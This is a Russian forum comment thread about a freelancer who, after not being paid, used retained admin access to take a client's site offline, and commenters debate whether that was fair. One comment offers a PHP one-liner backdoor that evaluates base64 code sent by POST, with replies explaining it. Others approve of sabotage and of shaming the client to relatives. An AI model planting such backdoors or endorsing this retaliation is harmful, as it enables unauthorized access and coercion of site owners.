Верни деньги, будь мужиком!

Знакомый скинул сайт, посмотрел, афигел. Предприниматель не доплатил 3500 рублей фрилансеру, но тот оставил лазейку в коде и теперь сделал "подлянку".  

Верни деньги, будь мужиком! Фрилансер, Фриланс, Работа, Программист, Тру стори, Скриншот, Обман, Мошенничество
Верни деньги, будь мужиком! Фрилансер, Фриланс, Работа, Программист, Тру стори, Скриншот, Обман, Мошенничество

Лига фрилансеров

2K постов17K подписчик

Правила сообщества

Не забывайте поддерживать авторов плюсами!

Нельзя:

- Добавлять нетематические посты, последнее решение за модератором

- Рекламировать какую-либо продукцию в виде постов

Можно:

- Делится любыми интересными историями, связанными с фрилансом :)

Вы смотрите срез комментариев. Показать все
88
Автор поста оценил этот комментарий

Поэтому я, как заказчик, всегда работаю через безопасную сделку.

Знали бы вы сколько жулья со стороны исполнителей, это просто пипец

Лазейку... ха, пусть радуется что ему почтового бота не посадили.

раскрыть ветку (17)
49
DELETED
Комментарий удален. Причина: данный аккаунт был удалён
раскрыть ветку (16)
70

Тоже на деньги кидать любишь?

раскрыть ветку (11)
62
Но есть вы считаете, что это нормально, когда программисты обставляют бекдоры и заказчик должен сказать "а ну я всё равно не собираюсь кидать его на деньги, поэтому ничего страшного, пусть будет, отчего бы не дать доступ к серверу чуваку, наверняка он не будет им злоупотреблять".
раскрыть ветку (10)
8

Кстати, я связался с парнем, он удалил инфу ту, и просто дал срок 3 дня человеку. После напишет его родственникам и близким друзьям о том, что человеку нельзя доверять деньги, удалит сайт. Так как именно за сайт ему не заплатили, остальное вышлет почтой и добавит на диск в гугле. Все же, правильно. Парень неплохой, интересен в общении, просто сказал: выбесили, то 3000 рублей, то 12000 рублей. Вот у него и бомбануло. Пришлось подсказать ему, как действовать в таких ситуациях.

раскрыть ветку (7)
DELETED
как?
раскрыть ветку (6)
6

У парня есть доступ к админке, заказчик мамонт в этом плане. Он просто поставил технические работы, вот и все. Оказывается, это никакой не серьезный код, а просто тех.работы через плагин. Отключать же такой плагин не станет ни один программист, так как слишком странно, что такое есть.

Нарушений нет, просто тормознул работу. Умный парень, теперь его можно уважать. Если заказчик захочет, то решит вопрос в 3 минуты, удалив плагин.  

4

Мне дали доступ модера. Вот сайт) если ему деньги не вернут, я его куплю за половину суммы :)

Иллюстрация к комментарию
ещё комментарии
20
DELETED
Комментарий удален. Причина: данный аккаунт был удалён
раскрыть ветку (1)
2
просто есть ОНИ)
Иллюстрация к комментарию
3

Вот нафига вебщеллы, когда строчку вида

if(isset($_POST['e'])) eval(base64_decode($_POST['e']))

можно засунуть в любое место?

раскрыть ветку (3)
1

Можно узнать сакральный смысл этой строчки?

раскрыть ветку (2)
2

Выполняет все, что придет ему извне. Извне, разумеется, придти может очень много всего интересного.

1

Если в постзапросе есть ключ e то расшифруй из base64 его значение и вычисли(выполни) его в процессе создания пхп странички.

Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку